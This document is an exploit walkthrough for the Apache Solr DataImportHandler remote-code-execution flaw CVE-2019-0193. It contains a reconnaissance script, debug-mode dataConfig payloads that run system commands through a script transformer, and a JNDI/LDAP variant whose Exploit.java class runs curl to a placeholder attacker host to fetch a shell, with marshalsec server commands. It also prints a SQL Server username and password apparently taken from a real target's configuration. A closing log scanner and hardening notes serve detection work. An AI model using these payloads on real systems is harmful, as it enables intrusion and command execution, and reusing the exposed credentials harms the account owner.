CVE-2019-0193

Apache Solr DataImportHandler RCE

1. First check whether the Solr admin UI and API are reachable without authentication (most exposed instances are: Solr ships with no authentication enabled).

2. Check whether any cores or collections exist.


3. Check whether the collection has the dataimport feature available, i.e. a request handler backed by DataImportHandler.

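The three checks above as an added Python example (not code from the original writeup): it queries Solr's admin API with no credentials, lists cores or collections, looks for a handler whose class is DataImportHandler, and reads the version, because Solr 8.2.0 (the CVE-2019-0193 fix) stops honouring the dataConfig request parameter unless the JVM is started with -Denable.dih.dataConfigParam=true. The base URL, core names and the sample JSON responses are constructed.

```python
"""Recon helpers for CVE-2019-0193: unauthenticated access, cores/collections, DIH handler,
and the version gate for the 8.2.0 fix. Added example, not part of the original writeup;
sample responses below are constructed in the shape of Solr 7.x/8.x JSON output."""
import json
import sys
import urllib.parse
import urllib.request


def solr_get(base_url, path, **params):
    """GET a Solr endpoint and decode JSON. Succeeding here with no credentials is check 1."""
    params["wt"] = "json"
    url = f"{base_url.rstrip('/')}{path}?{urllib.parse.urlencode(params)}"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return json.loads(resp.read().decode("utf-8"))


def parse_version(spec_version):
    """'8.1.1' -> (8, 1, 1); tolerates '9.0.0-SNAPSHOT' and two-part versions."""
    nums = [int(p) for p in spec_version.split("-")[0].split(".")[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def accepts_data_config_by_default(system_info):
    """Solr < 8.2.0 accepts the dataConfig request parameter unconditionally. 8.2.0+ rejects it
    unless the JVM runs with -Denable.dih.dataConfigParam=true (the CVE-2019-0193 fix).
    system_info is the response of /solr/admin/info/system."""
    return parse_version(system_info["lucene"]["solr-spec-version"]) < (8, 2, 0)


def core_names(core_status):
    """Check 2, standalone: core names from /solr/admin/cores?action=STATUS."""
    return sorted(core_status.get("status", {}))


def collection_names(collection_list):
    """Check 2, SolrCloud: names from /solr/admin/collections?action=LIST."""
    return sorted(collection_list.get("collections", []))


def dataimport_handlers(mbeans):
    """Check 3: handler paths backed by DataImportHandler, from /solr/<core>/admin/mbeans?cat=QUERY
    (the category is called QUERYHANDLER on Solr 6 and older). With the default json.nl=flat the
    'solr-mbeans' value is a flat list [category, {handlers}, ...]; with json.nl=map it is a dict."""
    beans = mbeans.get("solr-mbeans", [])
    categories = dict(zip(beans[0::2], beans[1::2])) if isinstance(beans, list) else beans
    found = []
    for handlers in categories.values():
        for path, info in handlers.items():
            if "DataImportHandler" in str(info.get("class", "")):
                found.append(path)
    return sorted(found)


# Constructed sample responses.
SAMPLE_SYSTEM = {"lucene": {"solr-spec-version": "7.7.2"}}
SAMPLE_CORES = {"status": {"TrainUpCore": {"name": "TrainUpCore"}, "other": {"name": "other"}}}
SAMPLE_MBEANS = {"solr-mbeans": ["QUERY", {
    "/select": {"class": "org.apache.solr.handler.component.SearchHandler"},
    "/dataimport": {"class": "org.apache.solr.handler.dataimport.DataImportHandler"},
}]}


def main(base_url):
    system = solr_get(base_url, "/solr/admin/info/system")
    gate = "dataConfig param accepted by default" if accepts_data_config_by_default(system) \
        else "needs -Denable.dih.dataConfigParam=true"
    print("solr-spec-version:", system["lucene"]["solr-spec-version"], f"({gate})")
    for core in core_names(solr_get(base_url, "/solr/admin/cores", action="STATUS")):
        handlers = dataimport_handlers(solr_get(base_url, f"/solr/{core}/admin/mbeans", cat="QUERY"))
        print(core, "dataimport handlers:", handlers or "none")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8983")  # assumed target URL
```

If the version check reports a release at or above 8.2.0 and the handler exists, the debug-mode path below still fails unless the operator re-enabled the dataConfig parameter; that JVM flag is what to look for in a hardening review.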

4. Use the DataImport debug mode to submit a modified configuration: with debug enabled, the UI sends the edited dataConfig in the request itself and the handler executes it in place of the configuration on disk.

Original:

<dataConfig>
  <dataSource  type="JdbcDataSource"
               driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
               url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
               user="pid.trainup"
               password="S@cram3nt0"
               readOnly="true"
              />


  <document name="TrainUpDoc">
  <entity name="Lo" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithoutLocation order by ItemTitle">
                          <field column="ItemTitle" name="ItemTitle"/>
                          <field column="ItemCourseId" name="ItemCourseId"/>
                          <field column="ItemDescription" name="ItemDescription"/>
                          <field column="Price" name="ItemPrice"/>
                          <field column="ItemDurationType" name="ItemDurationType"/>
                          <field column="ItemDurationValue" name="ItemDurationValue"/>
                          <field column="typeItemCode" name="typeItemCode"/>
                          <field column="ProviderWeight" name="ProviderWeight"/>
                          <field column="ItemCatId" name="ItemCatId"/>
                          <field column="PublishedDate" name="PublishedDate"/>
                          <field column="ItemImageUrl" name="ItemImageUrl"/>
                          <field column="ItemTrainingRating" name="ItemTrainingRating"/>
                          <field column="#Row" name="#Row"/>
                          <field column="ItemCatImageUrl" name="ItemCatImageUrl"/>
                          <field column="ItemEventsno" name="ItemEventsno"/>
                          <field column="CourseWeight" name="CourseWeight"/>
                          <field column="CategoryRankScore" name="CategoryRankScore"/>
                          
  </entity>
  </document>
</dataConfig>

[1] Blind command execution (no output returned), by editing the configuration directly:

(1) Add transformer="script:f1" to the entity; f1 is the name of the script function

(2) Add a <script> block containing that function

(3) Execute with this configuration

<dataConfig>
  <dataSource  type="JdbcDataSource"
               driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
               url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
               user="pid.trainup"
               password="S@cram3nt0"
               readOnly="true"
              />
  <script><![CDATA[
    // ScriptTransformer callback: f1 is invoked once per row and runs inside the Solr JVM
    function f1(row) {
      java.lang.Runtime.getRuntime().exec("powershell xxx");
      return row;
    }
  ]]></script>


  <document name="TrainUpDoc">
  <entity name="Lo" transformer="script:f1" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithLocation order by ItemTitle">
                          <field column="ItemTitle" name="ItemTitle"/>
                          <field column="ItemCourseId" name="ItemCourseId"/>
                          <field column="ItemDescription" name="ItemDescription"/>
                          <field column="Price" name="ItemPrice"/>
                          <field column="ItemDurationType" name="ItemDurationType"/>
                          <field column="ItemDurationValue" name="ItemDurationValue"/>
                          <field column="typeItemCode" name="typeItemCode"/>
                          <field column="ProviderWeight" name="ProviderWeight"/>
                          <field column="ItemCatId" name="ItemCatId"/>
                          <field column="PublishedDate" name="PublishedDate"/>
                          <field column="ItemImageUrl" name="ItemImageUrl"/>
                          <field column="ItemTrainingRating" name="ItemTrainingRating"/>
                          <field column="#Row" name="#Row"/>
                          <field column="ItemCatImageUrl" name="ItemCatImageUrl"/>
                          <field column="ItemEventsno" name="ItemEventsno"/>
                          <field column="CityItemEventsno" name="CityItemEventsno"/>
                          <field column="StartDate" name="StartDate"/>
                          <field column="StartTime" name="StartTime"/>
                          <field column="TimeZone" name="TimeZone"/>
                          <field column="MarketCityID" name="MarketCityID"/>
                          <field column="ItemCity" name="ItemCity"/>
                          <field column="CourseWeight" name="CourseWeight"/>
                          <field column="CategoryRankScore" name="CategoryRankScore"/>
  </entity>
  </document>
</dataConfig>


[2] Command execution with output returned, by editing the configuration directly:

(1) Add transformer="script:f1" to the entity; f1 is the name of the script function

(2) Add the <script> block and have it write the command output into one of the row's fields, such as id or ItemDescription, so the value comes back in the debug response; if it does not appear, the field being written must be one that the core's managed-schema actually defines

(3) Execute with this configuration

<dataConfig>
  <dataSource  type="JdbcDataSource"
               driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"
               url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"
               user="pid.trainup"
               password="S@cram3nt0"
               readOnly="true"
              />
  <script><![CDATA[
    // Reads the first line of the command's stdout and stores it in the "id" column, so the
    // debug response (which returns the processed documents) carries the output back
    function f1(row) {
      var p = java.lang.Runtime.getRuntime().exec("whoami");
      row.put("id", new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream())).readLine());
      return row;
    }
  ]]></script>


  <document name="TrainUpDoc">
  <entity name="Lo" transformer="script:f1" query="select newid() id, * from CatalogSearch.Categories_LiveTrainingWithLocation order by ItemTitle">
                          <field column="ItemCourseId" name="id"/>
                          <field column="ItemDescription" name="ItemDescription"/>
                          <field column="Price" name="ItemPrice"/>
                          <field column="ItemDurationType" name="ItemDurationType"/>
                          <field column="ItemDurationValue" name="ItemDurationValue"/>
                          <field column="typeItemCode" name="typeItemCode"/>
                          <field column="ProviderWeight" name="ProviderWeight"/>
                          <field column="ItemCatId" name="ItemCatId"/>
                          <field column="PublishedDate" name="PublishedDate"/>
                          <field column="ItemImageUrl" name="ItemImageUrl"/>
                          <field column="ItemTrainingRating" name="ItemTrainingRating"/>
                          <field column="#Row" name="#Row"/>
                          <field column="ItemCatImageUrl" name="ItemCatImageUrl"/>
                          <field column="ItemEventsno" name="ItemEventsno"/>
                          <field column="CityItemEventsno" name="CityItemEventsno"/>
                          <field column="StartDate" name="StartDate"/>
                          <field column="StartTime" name="StartTime"/>
                          <field column="TimeZone" name="TimeZone"/>
                          <field column="MarketCityID" name="MarketCityID"/>
                          <field column="ItemCity" name="ItemCity"/>
                          <field column="CourseWeight" name="CourseWeight"/>
                          <field column="CategoryRankScore" name="CategoryRankScore"/>
  </entity>
  </document>
</dataConfig>


[3] JNDI + LDAP (no JDBC driver needed on the target's CLASSPATH: when jndiName is set, JdbcDataSource obtains its DataSource through InitialContext.lookup() instead of loading a driver):

(1) Modify the configuration as follows

<dataConfig>
	<dataSource type="JdbcDataSource"
		jndiName="ldap://xxx.xxx.xxx.xxx:1389/Exploit"/>
	<document>
		<entity name="test">
		</entity>
	</document>	
</dataConfig>

(2) Attacker-controlled server

Exploit.java

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.*;
import java.util.Hashtable;

// Served from the HTTP codebase that the LDAP Reference points at. When the target's
// JdbcDataSource calls InitialContext.lookup(jndiName), the JDK fetches this class and
// invokes getObjectInstance, so the payload runs inside the Solr JVM.
public class Exploit implements ObjectFactory {

    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        try {
            Runtime.getRuntime().exec("curl http://xxx.xxx.xxx.xxx:1212/getshell");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return null;
    }
}

Recent JDKs refuse to load the factory class from a remote codebase: since 8u191 (and 7u201, 6u211, 11.0.1) com.sun.jndi.ldap.object.trustURLCodebase defaults to false, so this variant only works when the target runs an older JDK.

javac --release 7 Exploit.java

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xxx.xxx.xxx.xxx:8888/#Exploit 1389

python3 -m http.server 8888

(3) Execute with this configuration

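The detection side of the three variants, as an added Python example that is not part of the original writeup: the script transformer ([1], [2]) and the JNDI lookup ([3]) both leave the attacker-supplied dataConfig URL-encoded in Solr's request log (the o.a.s.c.S.Request lines in solr.log), so a scanner over that log can flag every /dataimport request that carries its own dataConfig and classify it. The log lines below are constructed to match that layout; the core name and addresses are placeholders.

```python
"""Scan Solr request-log lines (solr.log, o.a.s.c.S.Request entries) for CVE-2019-0193 use.
Added example, not part of the original writeup. Solr logs request parameters URL-encoded
inside params={...}; a dataimport request that carries a dataConfig parameter is the
indicator, since legitimate imports take their config from disk."""
import re
import sys
import urllib.parse

REQUEST_RE = re.compile(
    r"^(?P<ts>\S+ \S+) .*?o\.a\.s\.c\.S\.Request \[(?P<core>[^\]]*)\]\s+webapp=\S+ "
    r"path=(?P<path>\S+) params=\{(?P<params>.*)\}(?: hits=\d+)? status=(?P<status>\d+)"
)
EXEC_RE = re.compile(r"Runtime\.getRuntime\(\)\.exec\(([^)]*)\)")


def scan_line(line):
    """Return a finding dict for a /dataimport request carrying dataConfig, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    params = {k: v[0] for k, v in urllib.parse.parse_qs(m["params"], keep_blank_values=True).items()}
    if not m["path"].endswith("/dataimport") or "dataConfig" not in params:
        return None  # status/abort/regular full-import requests use the config on disk
    cfg = params["dataConfig"]
    tags = ["dataConfig-in-request"]
    if params.get("debug") == "true":
        tags.append("debug-mode")
    if re.search(r"<script\b", cfg, re.I):
        tags.append("script-transformer")        # variants [1] and [2]
    if re.search(r"\bjndiName\s*=", cfg, re.I):
        tags.append("jndi-lookup")               # variant [3]
    return {"time": m["ts"], "core": m["core"], "status": int(m["status"]), "tags": tags,
            "exec": [e.group(1) for e in EXEC_RE.finditer(cfg)]}


def scan_lines(lines):
    return [f for f in map(scan_line, lines) if f]


def _line(ts, thread, core, path, params, tail):
    """Constructed solr.log request line in Solr's default layout."""
    return (f"{ts} INFO  (qtp2012993076-{thread}) [   x:{core}] o.a.s.c.S.Request [{core}]  "
            f"webapp=/solr path={path} params={{{urllib.parse.urlencode(params)}}} {tail}")


# Constructed payloads mirroring the writeup's variants (placeholder addresses).
SCRIPT_CFG = ('<dataConfig><dataSource type="JdbcDataSource" driver="com.microsoft.sqlserver.jdbc.SQLServerDriver"'
              ' url="jdbc:sqlserver://SqlServer;databaseName=TrainUpCore"/>'
              '<script><![CDATA[function f1(row){java.lang.Runtime.getRuntime().exec("whoami");return row;}]]></script>'
              '<document><entity name="Lo" transformer="script:f1" query="select 1"/></document></dataConfig>')
JNDI_CFG = ('<dataConfig><dataSource type="JdbcDataSource" jndiName="ldap://192.0.2.10:1389/Exploit"/>'
            '<document><entity name="test"/></document></dataConfig>')

LOG_LINES = [
    _line("2019-08-10 00:07:39.221", 15, "TrainUpCore", "/select", {"q": "*:*", "wt": "json"}, "hits=3 status=0 QTime=1"),
    _line("2019-08-10 00:07:41.004", 17, "TrainUpCore", "/dataimport", {"command": "status", "wt": "json"}, "status=0 QTime=0"),
    _line("2019-08-10 00:07:42.517", 19, "TrainUpCore", "/dataimport",
          {"command": "full-import", "debug": "true", "verbose": "false", "clean": "false",
           "commit": "true", "dataConfig": SCRIPT_CFG}, "status=0 QTime=812"),
    _line("2019-08-10 00:09:03.090", 21, "TrainUpCore", "/dataimport",
          {"command": "full-import", "debug": "true", "dataConfig": JNDI_CFG}, "status=500 QTime=3046"),
]

if __name__ == "__main__":
    source = open(sys.argv[1]) if len(sys.argv) > 1 else LOG_LINES  # usage: python scan.py solr.log
    for finding in scan_lines(source):
        print(finding)
```

A 500 status on the JNDI line is expected when the lookup fails, so the status must not be used to suppress the alert; the presence of dataConfig in the request is the signal regardless of outcome.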